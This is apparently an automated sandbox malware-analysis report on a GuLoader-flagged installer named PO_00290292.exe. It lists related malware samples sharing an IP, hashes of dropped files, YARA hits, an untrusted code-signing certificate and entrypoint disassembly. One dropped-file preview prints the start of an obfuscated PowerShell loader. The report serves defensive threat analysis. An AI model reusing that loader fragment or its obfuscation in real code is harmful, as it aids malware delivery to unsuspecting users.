                                            • 104.237.62.211
                                            Proforma_Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            SecuriteInfo.com.Win32.PWSX-gen.1352.2615.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            SecuriteInfo.com.Win32.PWSX-gen.15348.28328.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            SecuriteInfo.com.Win32.PWSX-gen.21844.9999.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            bTgH.exeGet hashmaliciousNjratBrowse
                                            • 104.237.62.211
                                            3B18P2HItV.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 104.237.62.211
                                            SecuriteInfo.com.Win32.PWSX-gen.17929.17557.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            SecuriteInfo.com.Trojan.Packed2.46177.25997.17888.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.237.62.211
                                            New_Project_1.exeGet hashmaliciousPhemedrone Stealer, XmrigBrowse
                                            • 104.237.62.211

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dllteamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                              teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                                SMGS-RCDU5010031.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                  SMGS-RCDU5010031.exeGet hashmaliciousGuLoaderBrowse
                                                    RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoaderBrowse
                                                        IMG-2023010_WAA646737kendelsesordningenBalneo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          IMG-2023010_WAA646737kendelsesordningenBalneo.exeGet hashmaliciousGuLoaderBrowse
                                                            Pepsico_LLC_RFQ_Information.com.exeGet hashmaliciousGuLoaderBrowse
                                                              Pepsico_LLC_RFQ_Information.exeGet hashmaliciousGuLoaderBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):8003
                                                                Entropy (8bit):4.838950934453595
                                                                Encrypted:false
                                                                SSDEEP:192:Dxoe5nVsm5emdZ2Ca6pZlbjvwRjdHPRhwgkjDt4iWN3yBGHB9smMdcU6CDpOeibY:NQopbjvwRjdvR5kjh4iUxeLib4J
                                                                MD5:3D6DC70FDDC7BE176013904F5F6ED066
                                                                SHA1:73638AF4A419E0A7DC397B9477A0C2EDB8DE9490
                                                                SHA-256:5D7466A771B69DBDB540C50BC6EBE324B4FA3BDA6E0F4CC92CEC930148FCCFAA
                                                                SHA-512:60552F022AE9418514820B7BF8243434FFE2BBEE7F34D8ED7D053679928C583CFB4C07FE62588629A6064C196184F6DB0D7FDBDB26692FC1CA9B1C99F248B117
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1272
                                                                Entropy (8bit):5.397399275438495
                                                                Encrypted:false
                                                                SSDEEP:24:37WSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R88Hr2Vbu:rWSU4y4RQmFoUeUmfmZ9tlNWR8OqVbu
                                                                MD5:331F69B9C429BA0CE71C04EA0AA4B115
                                                                SHA1:BC95D0936B2B208A7AA48A1A259ADA1216BFD5A1
                                                                SHA-256:D51677FF5BAB9E2060FF6B67F1A1958F11178EF36DF8D2BD9F043826CA47E8DE
                                                                SHA-512:85413E9CC5CA9B12FA835D479904834EA3E1BEC693CCE00E496E98398AD02EF7914621611752445932384C1B2A5F188B2513C02974254B12951FC0D8E2215289
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dd44r4f.15t.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nocsdsx.j0b.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c35zokgc.wxk.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p11uspji.ydw.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\nse6573.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):622200
                                                                Entropy (8bit):6.838437002582809
                                                                Encrypted:false
                                                                SSDEEP:12288:Ha6fxHweMUQ40g8wIIyvjzYe+rYEN5ROp2V61/shyx:Ha8QePLawIIfe+364k
                                                                MD5:75467CCB43B0B4E9C00DA1E113D822A2
                                                                SHA1:BD98D3A2F3177332BCDEA40EAE864D61D948F8BC
                                                                SHA-256:1672DDA711832E387CEF6CD9EFD2F5FCE78BFC720313EFD59493E6292D122F40
                                                                SHA-512:5F6386C6AEBB89C58DAC087A454C59D617D3DBC44DC06F7C12A6659433C158ACF6D3991513E47D6FD14C265ED8C60B04EE5B159E0C45C3A31A918A5A0078455C
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nse6573.tmp, Author: Joe Security
                                                                Preview:........,.......................p.......n.......<...................................................................=.......!...............................................................................................................................................................G...Z...........p...j...............................................................................................................................\...........[...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6656
                                                                Entropy (8bit):5.140229856656103
                                                                Encrypted:false
                                                                SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                • Filename: Pepsico_LLC_RFQ_Information.com.exe, Detection: malicious, Browse
                                                                • Filename: Pepsico_LLC_RFQ_Information.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:ASCII text, with very long lines (25948), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):25948
                                                                Entropy (8bit):5.5477091710283215
                                                                Encrypted:false
                                                                SSDEEP:384:36dq0MO0QFoK3k8Ae0Z24ftUeQv54J+vkwCc+MMFTbr0UN1DDHa1D0bBJ+mMtz4:6rMO0QFook008gexVCT1Nt61SDMi
                                                                MD5:718548247C1303664965903558D95C2F
                                                                SHA1:37A83A369F564C019D7BDF7CC936A2EAF7C03CE4
                                                                SHA-256:A12EE66022E1C0CFB89FD16745AAFC346D4A475944C4552888096D6DA5823186
                                                                SHA-512:0F7CC73C3407317CF85BE2C5316C8FE547371848494A91B3A95E3E6ECFA0F5BAC0284896DFFFD954F7CD003125D559534A69F783BDA7874CDFF62059454CCFEC
                                                                Malicious:true
                                                                Preview:<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu.Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K.Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInne

                                                                C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\centimo.kog

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):45671
                                                                Entropy (8bit):4.90795232450819
                                                                Encrypted:false
                                                                SSDEEP:768:esbuwu3TGi72cX8yrm7pabOb8XVVGP+P5chQG6LaJ1Lq675HxZRMQJ8D0:esil3TD2O8yrmEdFVLh8YLU1Lq25fRMM
                                                                MD5:A3B99B2106C825413B33478E9973057B
                                                                SHA1:168395C750F8C3ED83129E355AEAB99FF8E2CBD4
                                                                SHA-256:03F143F0013A807841AD608E2E1BBD868E4BE6B1CDA3F2ABEEE13B83EA6D6C0F
                                                                SHA-512:03137A4C651911E42C003859571DC57B96D76002C4A221C23C7139815168402E857DF6FE7BDFDF91618F75E11367C2CBFBA79579AFF147DD2D8F5C4C4B26DE8C
                                                                Malicious:false
                                                                Preview:...B.#.............U.......].........G.................. ..MKv.....9.......(....../.f....Ii....).........$........(...<vV{.g......iqR.O......?._$2...A.1.).}..a.E....>........^1..s.....?.x[.........9.......xp.M..)^.k......cL...q.j..F:.......nR..D.J.....}............-...f....}.s.......ry.wg....`.....?..b..)....|...........{......U.......E..<.b........t.........................:....{....... ...&....N.....0.v.'......*............O...^.....h...)..................;.".....S.............@.......M..........L....\........0......................E.{...........x..~>........>...[...s.E=_....U.........t....>..C...... ..5...%[-......y.......*...@%........~l...B..+.$...[..|..6.?.........".......................?.......*..p.C......Q...#.P.........W..^...e.........#...q.%}...-@.....>X..d................"...........g...4...............-\....k.......k..........6.....d...r_W....N..........$.F....d...............!..................F..v................f...B......[...).f.5q......LT..a.......J..............

                                                                C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\nglepersoners.cas

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):26429
                                                                Entropy (8bit):4.907195976945197
                                                                Encrypted:false
                                                                SSDEEP:768:x0akO5waWRx/acJalHVyLMtomP6KLx9uQ:WakO2n3/mHVttoI6Ax4Q
                                                                MD5:9DA6E8F56037E6935CB6161A6DFCBF21
                                                                SHA1:5A4B78DF18AFF5367E1BC7B423C0077AEF44283A
                                                                SHA-256:19E727679ED75F15F5762E0EAABBFF42EB1A45A7E1F2689CE03F1147EAEA3D93
                                                                SHA-512:2EB2F4BF87CDEB784F65AA14E4EBA59988B91B8CB220254E0997BE78A669129EC5B123F730B6206042BD65C4F05424494C24FF806A4088DBED72CF5C1A6377CC
                                                                Malicious:false
                                                                Preview:2.cj....~.z........@...".`......D..)B....<......j...{......7.....F.......4M..z.DP/..\.......(..g...l.}....3...i.a.[..........................,.&g.........`i.......b....F..4p............KY=.0...|..........a*.I....../...J0.....:.P...N.....YIl.....C........N.".Kc4...]..H...............=.QF..:|jx.....................+..........s8........x..........8.......V.z......I0....................:....^.s.....o..g......]......@.+Q.4......#..........$.......4..~....*@c...9i......my............b../..........`..[.....h.]...S..............$..i8................]N].0....V.....8...|.....7...............H...o.|..l.Jg..l......9...F....B/............3.AO..|...z".........w..........I...............\9.........~...............0.....@.rd....{..a.......(..K.H.....w..B........Q........................:`...........;..>......Q............."...8..*.......3....n...(..............f...J......f.}.c>..............................*.........5.}G..P.....9.3............J{............m.3.....1.............B......

                                                                C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\oceanographers.por

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):75475
                                                                Entropy (8bit):4.940792498010488
                                                                Encrypted:false
                                                                SSDEEP:1536:Pn0ebls0Q+hOkjmWBenn5z+6NmRbCwGX12gSoQiLgKb5FYMYC:Pnls6h9m3n5aRbCYA5FY4
                                                                MD5:F1285913BD7A50C2D704DC961C188D16
                                                                SHA1:785F2E3A20C671F5B9F1299DCC6570871663C128
                                                                SHA-256:05FFBABD8BF53A9FB30E39E5E7F9CF8A7CFDA60453FE6F85E4F79B7E09055F44
                                                                SHA-512:959D5C22471D2A1DEE641B43D187EFF3D53A1BCB29069764D663C6280975B9EE9F8FAF8EFAF34404D361A9DC6736B1FA1800003CC0CD4ACA3E52744F3A67713F
                                                                Malicious:false
                                                                Preview:....F... ....<...o]s.?. .3...........).........X...Z..J$.........;..k7.....b................:9.v.bn..........UN.z."...!.......#..[.....$U.......#.....}..............8.L.......1......@......z......%.=/u.;....gS....M\..........m..............(.......W..K.....:.Z....#......K......,I.r.........P"....i+..)p....p.H..m..S{Y!}...B........~......%...........R........d...o...p..........q~....[.............*.....w...5..1..u......_D@p..........m....,.....A................S..*.q....+w.G...l..........3....s.........1f9.......S7.../.:...?K.g....`..M..;.....L.......`........@.....m...u.....G...s....|......,............5........I ...............:...........:.........|...................@.9..J....mD.).9..........=,...H.........c;........5.............[.....img...J.....................zZ............\.X.......=...U.s...I:....9.....>.I................~...C'...@...".....W...v...............u................T...S...}RW..E`..............h.......\.....4....[..[...........|.........K..b..8z.r.

                                                                C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\sarawakese.dri

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):371116
                                                                Entropy (8bit):7.85868335109414
                                                                Encrypted:false
                                                                SSDEEP:6144:iNGuGCIM5ZVt80g3j83l5wryMUlsd5o70g8wISgIynvjRLZjajve+rw88EBN5ud4:ia6fxHweMUQ40g8wIIyvjzYe+rYEN5j
                                                                MD5:9B1B97D65493135C635B1A5666771597
                                                                SHA1:EA94964C812958C19070AF90F28D526951FECB40
                                                                SHA-256:DE0E75FCA60CBE4F2DC6A6B3D20BE8F78E40822DD6F6451263252C935145AFBA
                                                                SHA-512:ACAD88A403F8D8329527FBB8081966A62AD23031494D0E9C017188BC63544F94A17A1C8C9AFEE620C061A87FF298208FDA758DF702ECDC168028B0BA171FBD47
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\sarawakese.dri, Author: Joe Security
                                                                Preview:...............MM..................%.%.6..............vvvv......................"...............kk....d.U.....,.......m....??.... ......Z..................!!.^^^.........///.Z.................v...............................]...+..."..www.................uu...........FF.WWWW..........LL.........""...GG....................44.....K..........0...G................}}.................77................R......................]]].....................sss........x................kk......dddd..............w...____.............~~.......b.......R.......;;............................................._..........._.................B...<..............................................fff......................//...................".pp...............Y...CC....j..............!!.............u.DDD..>..................kk.ee.............r.............u..T.....ppp.....n...............7777.&.......qqq.P....;;;.................44..=...........E.........s..ffff......................|......PPPPPP..................--

                                                                C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\trediedel.txt

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):319
                                                                Entropy (8bit):4.271581980615064
                                                                Encrypted:false
                                                                SSDEEP:6:CgT93WAirQXF9hb8HQnOnQm9/LK5RjnzF9slcLDQE0gM/dzJ:CgTNXFLXK1G5lxaU901l
                                                                MD5:45EFD154747B90956D3E892FBA8B6947
                                                                SHA1:4FA5DB84F62A95330F4113B97E34FC2D4C2986FC
                                                                SHA-256:3FAC82F24790DC893C8FBD41E058C06E362F555640F71800302DA23A07A1C2DE
                                                                SHA-512:73493D0A6CC63A4B31024FFF3F693768BE91ABF7DC90AF098DC7B13359F63EA109901249310414C3089D4507334888D25DA37BBB23219AB5E064B1CC4230BB28
                                                                Malicious:false
                                                                Preview:basunengels oldtidsminders brdfrugttrernes stormward urans..dansebulerne svindsottige indregistrere,terminalprocessens bundskraber funktionssymbolerne subumbilical.headworker overstarch quickies hverandres,hooky pirringernes handelshjskole adstringe forskes..tacitness grdekonens fusere zakarias instanding nedrykkende,

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\skrides.ini

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO_00290292.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):39
                                                                Entropy (8bit):3.8140156038557316
                                                                Encrypted:false
                                                                SSDEEP:3:dRH+IMqzrOuP:dd+IMqPX
                                                                MD5:482781AEC46A6737943C76FF0B4E2864
                                                                SHA1:F5161E368614B3BD66571E8921F4C2AE01977590
                                                                SHA-256:CFD2A6B98273B5DCB90F313340A1A6B172305893FCC779F2AC26C3C4954EDD02
                                                                SHA-512:4113652C465CCE5BEBB8B5082766D5B4F4C7C20BAFA694A6B2C429C8E96491207B0BEFC142ABF8F8E7C192FD03795724AD134196E9A0289FCEB8D343B14B46D8
                                                                Malicious:false
                                                                Preview:[retsbog]..utilizabilities=releasible..

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.848364686317889
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PO_00290292.exe
                                                                File size:566'744 bytes
                                                                MD5:cc69508628ade733aa8bd21a0a646514
                                                                SHA1:90a270f4529739d82941c6def0efa77eca1a3b09
                                                                SHA256:f216c47f4a5f65a59ded595d62c2470ceb14cc1c31c3a8b4667b8fc3eb276cc2
                                                                SHA512:c42b7e234dd5473e658687eb6bb1efb9c0dd5742ebdd974242a80c02d01be77305e2522073cc87193fedf02b1c683c48a97d2075a70592356ddc8e216f8e0df0
                                                                SSDEEP:12288:0g8/ZwHctOwMltJy48IpD5W0sV5b0AVsOmFUg93m:KeHckwItJy48IPW0Cj6OWU6m
                                                                TLSH:87C402C679C98CEAF83F49B3B09755791CD86ED672B110FB2B64B38424726838E5F418
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@

                                                                File Icon

                                                                Icon Hash:d56c6c51d5ce6d59

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4033b6
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:4ea4df5d94204fc550be1874e1b77ea7

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:E=Grnttrrestationen@Typicalness.Spi, O=Revne, CN=Revne, L=Valley Forge, S=Pennsylvania, C=US
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 10/10/2023 10:33:07 09/10/2026 10:33:07
                                                                Subject Chain
                                                                • E=Grnttrrestationen@Typicalness.Spi, O=Revne, CN=Revne, L=Valley Forge, S=Pennsylvania, C=US
                                                                Version:3
                                                                Thumbprint MD5:68FC36478BF0B5E96292261C3159FA24
                                                                Thumbprint SHA-1:AFE8E8AC4A5209BDF02FD2E0B40D2DAA723C0B9D
                                                                Thumbprint SHA-256:63D19C16B421AD654F8399B0900E9B35C3E6BC5B4818DD0D62160BB6E244089E
                                                                Serial:45F778947B66ED1EA3AE3F7C82961AD8FC899E3D

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                pop edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+14h], ebx
                                                                mov dword ptr [esp+10h], 0040A230h
                                                                mov dword ptr [esp+1Ch], ebx
                                                                call dword ptr [004080B4h]
                                                                call dword ptr [004080B0h]
                                                                cmp ax, 00000006h
                                                                je 00007F20D48F19C3h
                                                                push ebx
                                                                call 00007F20D48F4B1Ch
                                                                cmp eax, ebx
                                                                je 00007F20D48F19B9h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 004082B8h
                                                                push esi
                                                                call 00007F20D48F4A96h
                                                                push esi
                                                                call dword ptr [0040815Ch]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], 00000000h
                                                                jne 00007F20D48F199Ch
                                                                push ebp
                                                                push 00000009h
                                                                call 00007F20D48F4AEEh
                                                                push 00000007h
                                                                call 00007F20D48F4AE7h
                                                                mov dword ptr [0042A244h], eax
                                                                call dword ptr [0040803Ch]
                                                                push ebx
                                                                call dword ptr [004082A4h]
                                                                mov dword ptr [0042A2F8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+34h]
                                                                push 000002B4h
                                                                push eax
                                                                push ebx
                                                                push 004216E8h
                                                                call dword ptr [00408188h]
                                                                push 0040A384h
                                                                push 00429240h
                                                                call 00007F20D48F46D0h
                                                                call dword ptr [004080ACh]
                                                                mov ebp, 00435000h
                                                                push eax
                                                                push ebp
                                                                call 00007F20D48F46BEh
                                                                push ebx
                                                                call dword ptr [00408174h]
                                                                add word ptr [eax], 0000h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

